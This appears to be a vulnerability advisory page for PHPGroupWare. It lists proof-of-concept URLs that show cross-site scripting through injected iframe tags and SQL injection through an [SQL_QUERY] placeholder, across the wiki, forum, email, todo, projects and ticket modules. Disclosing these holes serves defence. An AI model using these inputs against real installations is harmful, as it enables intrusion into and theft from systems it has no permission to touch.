• info
• discussion
• exploit
• solution
• references

PHPGroupWare Multiple Cross-Site Scripting and SQL Injection Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:

Cross-site scripting:
http://www.example.com/phpgroupware/wiki/index.php?kp3=99884d8a63791f406585913d74476b11
%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=forum.uiforum.post&type=new%22
%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=202%22%
3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=forum.uiforum.read&forum_id=3%
22%3E%3Ciframe%3E&msg=202
http://www.example.com/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=42&pos=
10%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=preferences.uicategories.index
&cats_app=%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=preferences.uicategories.edit&
cats_app=notes&extra=&global_cats=True&cats_level=True&cat_parent=188&cat_id
=188%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=email.uimessage.message&msgbal
l[msgnum]=1%22%3E%3Ciframe%3E&msgball[folder]=INBOX.hello&msgball[acctnum]=0
&sort=1&order=1&start=0
http://www.example.com/phpgroupware/index.php?menuaction=email.uicompose.compose&fldbal
l[folder]=INBOX.hello&fldball[acctnum]=0&to=%22%3E%3Ciframe%3E&personal=&sor
t=1&order=1&start=0
http://www.example.com/phpgroupware/tts/viewticket_details.php?ticket_id=338%22%3E%3Cif
rame%3E

SQL Injection:
http://www.example.com/phpgroupware/tts/viewticket_details.php?ticket_id=355[SQL_QUERY]
http://www.example.com/phpgroupware/index.php?menuaction=todo.ui.show_list&order=[SQL_Q
UERY]&sort=ASC&filter=&qfield=&start=&query=
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.list_proje
cts&order=[SQL_QUERY]&sort=ASC&filter=&qfield=&start=&query=&pro_main=&actio
n=mains
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.edit_proje
ct&pro_main=31&action=subs&project_id=32[SQL_QUERY]
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.edit_proje
ct&pro_main=31[SQL_QUERY]&action=subs&project_id=32
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.view_proje
ct&pro_main=31&action=subs&project_id=32[SQL_QUERY]&domain=default
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.view_proje
ct&pro_main=31[SQL_QUERY]&action=subs&project_id=32&domain=default&494fbb
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojecthours.view_h
ours&project_id=32&pro_parent=&action=subs&hours_id=26[SQL_QUERY]&domain=def
ault